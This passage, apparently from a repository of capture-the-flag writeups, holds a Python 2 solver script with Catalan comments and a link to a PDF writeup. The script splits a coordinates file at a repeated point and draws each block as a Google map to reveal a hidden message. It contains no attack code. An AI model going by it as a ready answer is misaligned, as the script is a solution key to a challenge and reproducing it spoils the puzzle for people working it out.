18 |                                                                              /$$  | $$| $$                                    		\n\
19 |                                                                             |  $$$$$$/| $$                                    		\n\
20 |                                                                              \______/ |__/                                    		\n\
21 |                                                                                              Author: DarkEagle\n\n\n")
22 | 
23 | def separar():
24 |     with open(args.file,'r') as fo:
25 |         start=1
26 |         op=''
27 |         cntr=1
28 |         for x in fo.read().split('\n'):
29 |             if(x=='19.1399952, -72.3570972'):   # Coordenades que es repeteixen, seguent digit
30 |                 if (start==1):
31 |                     with open(str(cntr)+'bloc.txt','w') as opf:
32 |                         opf.write(op)
33 |                         opf.close()
34 |                         op=''
35 |                         cntr+=1
36 |                 else:
37 |                     start=1
38 |             else:
39 |                 if (op==''):
40 |                     op=x
41 |                 else:
42 |                     op=op + '\n' + x
43 |         fo.close()
44 |         print 'Separacio completa, fitxers totals: ',cntr-1
45 |         return (cntr-1)
46 | 
47 | def pintar_fitxer_coordenades(nom_fitxer):
48 | 
49 |     with open(nom_fitxer) as csvfile:
50 |         data = [(float(x), float(y)) for x, y in csv.reader(csvfile, delimiter= ',')]
51 | 
52 |     #print(data)
53 | 
54 |     # Place map Definim la posicio del mapa i el zoom
55 |     gmap = gmplot.GoogleMapPlotter(26.9009488,-43.857073717, 3)
56 | 
57 |     golden_gate_park_lats, golden_gate_park_lons = zip(*data)
58 |     gmap.plot(golden_gate_park_lats, golden_gate_park_lons, 'cornflowerblue', edge_width=10)
59 | 
60 |     # Draw
61 |     gmap.draw(nom_fitxer+'.bloc.html')
62 |     
63 | banner()
64 | parser = argparse.ArgumentParser(description='solve_final.py')
65 | requiredNamed = parser.add_argument_group('required named arguments')
66 | requiredNamed.add_argument('-f', '--file', help='File to decode', required=True)
67 | args = parser.parse_args()
68 | 
69 | num_fitxers=separar()
70 | num_fitxer=1
71 | while (num_fitxer < num_fitxers):
72 |     pintar_fitxer_coordenades(str(num_fitxer)+'bloc.txt')
73 |     num_fitxer+=1
74 | 
75 | print("Programa acabat: Els fitxers resultants (.html) es troben al directori del programa")


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/julianjm/julianjm-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/julianjm/julianjm-episodio3.pdf


--------------------------------------------------------------------------------